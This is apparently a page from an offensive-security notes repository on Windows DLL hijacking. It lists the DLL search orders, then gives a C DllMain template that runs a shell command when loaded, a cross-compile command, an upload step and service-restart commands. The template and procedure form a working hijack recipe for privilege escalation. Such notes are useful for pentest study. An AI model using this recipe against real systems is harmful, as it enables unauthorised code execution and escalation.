killchain-compendium/Exploits/Windows/DLL Hijacking.md

49 lines
1011 B
Markdown
Raw Normal View History

2022-11-13 22:38:01 +01:00
# DLL Hijacking
2023-02-25 20:40:13 +01:00
## Basics
### Search Orders
2022-11-13 22:38:01 +01:00
* __SafeDllSearchMode__ enabled searches paths in following order:
* __cwd__ of executable
* System directory, `GetSystemDirectory`
* 16-bit system directory
* Windows, `GetWindowsDirectory`
* __pwd__
* PATH
* __SafeDllSearchMode__ disabled searches in following order:
* __cwd__ of executable
* __pwd__
* System directory
* 16-bit system directory
* Windows directory
* PATH environment variable
2023-02-25 20:40:13 +01:00
### Template
2022-11-13 22:38:01 +01:00
```C
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
if (dwReason == DLL_PROCESS_ATTACH) {
system("cmd.exe /k whoami > C:\\Temp\\dll.txt");
ExitProcess(0);
}
return TRUE;
}
```
* Compilation via
```sh
x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
```
* Upload to target
* Restart dllsvervice via
```sh
sc stop dllsvc
sc start dllsvc
```
2023-02-25 20:40:13 +01:00
## LPE via StorSvc
* [BlackArrowSec's repository](https://t.co/8XMvewhgFn)